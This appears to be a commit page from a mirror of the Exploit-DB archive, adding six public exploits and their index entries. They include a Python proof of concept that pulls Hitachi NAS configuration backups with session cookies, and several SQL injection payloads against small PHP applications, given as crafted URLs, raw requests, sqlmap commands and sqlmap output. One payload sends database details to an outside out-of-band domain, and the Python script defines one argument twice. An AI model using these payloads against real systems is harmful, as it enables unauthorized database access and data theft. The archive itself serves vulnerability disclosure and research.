bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-03-21

Browse source 
7 changes to exploits/shellcodes/ghdb

HNAS SMU 14.8.7825 - Information Disclosure

Blood Bank 1.0 - 'bid' SQLi

CSZCMS v1.3.0 - SQL Injection (Authenticated)

Employee Management System 1.0 - 'admin_id' SQLi

Simple Task List 1.0 - 'status' SQLi

Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi
This commit is contained in:
Exploit-DB 2024-03-21 00:16:27 +00:00
parent bbffa273d4
commit a24ba3c94b
7 changed files with 296 additions and 0 deletions

92
exploits/hardware/remote/51915.py Executable file
View file

@ -0,0 +1,92 @@
# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure
# CVE: CVE-2023-6538
# Date: 2023-12-13
# Exploit Author: Arslan Masood (@arszilla)
# Vendor: https://www.hitachivantara.com/
# Version: < 14.8.7825.01
# Tested On: 13.9.7021.04
import argparse
from os import getcwd
import requests
parser = argparse.ArgumentParser(
description="CVE-2023-6538 PoC",
usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
)
# Create --host argument:
parser.add_argument(
"--host",
required=True,
type=str,
help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
)
# Create --id argument:
parser.add_argument(
"--id",
required=True,
type=str,
help="JSESSIONID cookie value"
)
# Create --sso argument:
parser.add_argument(
"--sso",
required=True,
type=str,
help="JSESSIONIDSSO cookie value"
)
# Create --id argument:
parser.add_argument(
"--id",
required=True,
type=str,
help="Server ID value"
)
args = parser.parse_args()
def download_file(hostname, jsessionid, jsessionidsso, serverid):
# Set the filename:
filename = "registry_data.tgz"
# Vulnerable SMU URL:
smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"
# GET request cookies
smu_cookies = {
"JSESSIONID": jsessionid,
"JSESSIONIDSSO": jsessionidsso
}
# GET request headers:
smu_headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Dnt": "1",
"Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1",
"Te": "trailers",
"Connection": "close"
}
# Send the request:
with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
with open(filename, 'wb') as backup_archive:
# Write the zip file to the CWD:
backup_archive.write(file_download.content)
print(f"{filename} has been downloaded to {getcwd()}")
if __name__ == "__main__":
download_file(args.host, args.id, args.sso, args.id)

18
exploits/php/webapps/51911.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi
# Date: 20-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-28595
# Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php.
# POC:
1. Here we go to : http://127.0.0.1/taskmatic/index.php
2. Now login with default Username and Password.
3. Visit the URL:
http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843
WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||'
4. Page will load for 5 seconds because of time-based sql injection
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md

45
exploits/php/webapps/51912.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Blood Bank 1.0 - 'bid' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46022
-------------------------------------------------------------------------------
# Description:
The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases.
Vulnerable File: /delete.php
Parameter Name: bid
# Proof of Concept:
----------------------
1. Intercept the request to cancel.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
4. Example request for bid parameter:
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
5. Database and version information is seized via Burp Suite Collaborator

43
exploits/php/webapps/51913.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Simple Task List 1.0 - 'status' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46023
-------------------------------------------------------------------------------
# Description:
Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.
Vulnerable File: /addTask.php
Parameter Name: status
# Proof of Concept:
----------------------
1. Register and login the system
2. Add a project and a task
3. Then use the sqlmap to exploit
4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=<php-cookie-value>" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db
# SQLMap Response:
----------------------
---
Parameter: status (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||'
---

50
exploits/php/webapps/51914.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46024
-------------------------------------------------------------------------------
# Description:
Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.
Vulnerable File: /index.php
Parameter Name: searchdata
# Proof of Concept:
----------------------
Execute sqlmap using either the 'searchdata' parameter to retrieve the current database:
sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db
SQLMap Response:
----------------------
---
Parameter: searchdata (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search=
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: searchdata=test%';SELECT SLEEP(5)#&search=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search=
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search=
---

42
exploits/php/webapps/51916.txt Normal file
View file

@ -0,0 +1,42 @@
# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Author: Abdulaziz Almetairy
# Date: 27/01/2024
# Vendor: https://www.cszcms.com/
# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Reference: https://github.com/oh-az
# Tested on: Windows 11, MySQL, Apache
# 1 - Log in to the admin portal
http://localhost/cszcms/admin/login
# 2 - Navigate to General Menu > Member Users.
# 3 Click the 'View' button next to any username.
# 4 Intercept the request
GET /cszcms/admin/members/view/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
Upgrade-Insecure-Requests: 1
# 5 Modify the paramter
/cszcms/admin/members/view/1
to
/cszcms/admin/members/view/'or(sleep(10))#
and url encode all characters
/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20

6
files_exploits.csv
View file

@ -3642,6 +3642,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,,2020-02-05,2020-02-05,0,,,,,,
47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,,2019-09-23,2019-09-23,0,,,,,,
10451,exploits/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",remote,hardware,,2009-12-13,,1,CVE-2009-4462;OSVDB-63325;OSVDB-61018,,,,,
51915,exploits/hardware/remote/51915.py,"HNAS SMU 14.8.7825 - Information Disclosure",2024-03-20,"Arslan Masood",remote,hardware,,2024-03-20,2024-03-20,0,CVE-2023-6538,,,,,
45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,,2018-07-18,2018-07-18,0,,,,,,
36429,exploits/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting",2011-12-08,"Silent Dream",remote,hardware,,2011-12-08,2015-03-19,1,CVE-2011-4836;OSVDB-77588,,,,,https://www.securityfocus.com/bid/50978/info
51885,exploits/hardware/remote/51885.py,"Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)",2024-03-14,ByteHunter,remote,hardware,,2024-03-14,2024-03-14,0,CVE-2023-3710,,,,,
@ -15006,6 +15007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8053,exploits/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,webapps,php,,2009-02-12,,1,OSVDB-51978,,,,,
28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info
5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz,
51912,exploits/php/webapps/51912.txt,"Blood Bank 1.0 - 'bid' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46022,,,,,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
51833,exploits/php/webapps/51833.txt,"Blood Bank v1.0 - Multiple SQL Injection",2024-02-28,"Ersin Erenler",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,,
@ -16542,6 +16544,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51703,exploits/php/webapps/51703.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
51704,exploits/php/webapps/51704.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
51863,exploits/php/webapps/51863.py,"CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution",2024-03-06,tmrswrr,webapps,php,,2024-03-06,2024-03-06,0,,,,,,
51916,exploits/php/webapps/51916.txt,"CSZCMS v1.3.0 - SQL Injection (Authenticated)",2024-03-20,"Abdulaziz Almetairy",webapps,php,,2024-03-20,2024-03-20,0,,,,,,
31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80,2014-02-07,2014-02-07,0,CVE-2013-2639;OSVDB-103117,,,,,
11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php,,2010-01-07,,1,,,,,,
11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-17,,1,,,,,,
@ -17932,6 +17935,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10069,exploits/php/webapps/10069.php,"Empire CMS 47 - SQL Injection",2009-10-05,"Securitylab Security Research",webapps,php,,2009-10-04,,1,CVE-2009-2269;OSVDB-55517,,,,,
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",2021-11-10,"İlhami Selamet",webapps,php,,2021-11-10,2021-11-10,0,,,,,,
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",2021-11-10,"Ragavender A G",webapps,php,,2021-11-10,2021-11-10,0,,,,,,
51911,exploits/php/webapps/51911.txt,"Employee Management System 1.0 - 'admin_id' SQLi",2024-03-20,"Shubham Pandey",webapps,php,,2024-03-20,2024-03-20,0,CVE-2024-28595,,,,,
48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
51803,exploits/php/webapps/51803.txt,"Employee Management System v1 - 'email' SQL Injection",2024-02-19,SoSPiro,webapps,php,,2024-02-19,2024-02-19,0,,,,,,
@ -29683,6 +29687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,,2021-04-13,2021-04-13,0,,,,,,
50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",2021-11-15,"Daniel Haro",webapps,php,,2021-11-15,2021-11-15,0,CVE-2021-43140,,,,,
51913,exploits/php/webapps/51913.txt,"Simple Task List 1.0 - 'status' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,,,,,,
51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40032,,,,,
7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php,,2008-12-13,,1,OSVDB-50712;CVE-2008-5763;OSVDB-50711;CVE-2008-5762,,,,,
50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
@ -30650,6 +30655,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9512,exploits/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,webapps,php,,2009-08-24,,1,,,,,,
37151,exploits/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",webapps,php,80,2015-05-29,2015-05-29,0,OSVDB-122580,,,,,
14203,exploits/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",webapps,php,,2010-07-04,2010-07-04,1,CVE-2010-2715;CVE-2010-2714;OSVDB-66314;OSVDB-66313,,,,http://www.exploit-db.comtcwphpalbum-1.0.tar.gz,
51914,exploits/php/webapps/51914.txt,"Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46024,,,,,
50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,,2021-02-15,2021-02-15,0,,,,,,

Can't render this file because it is too large.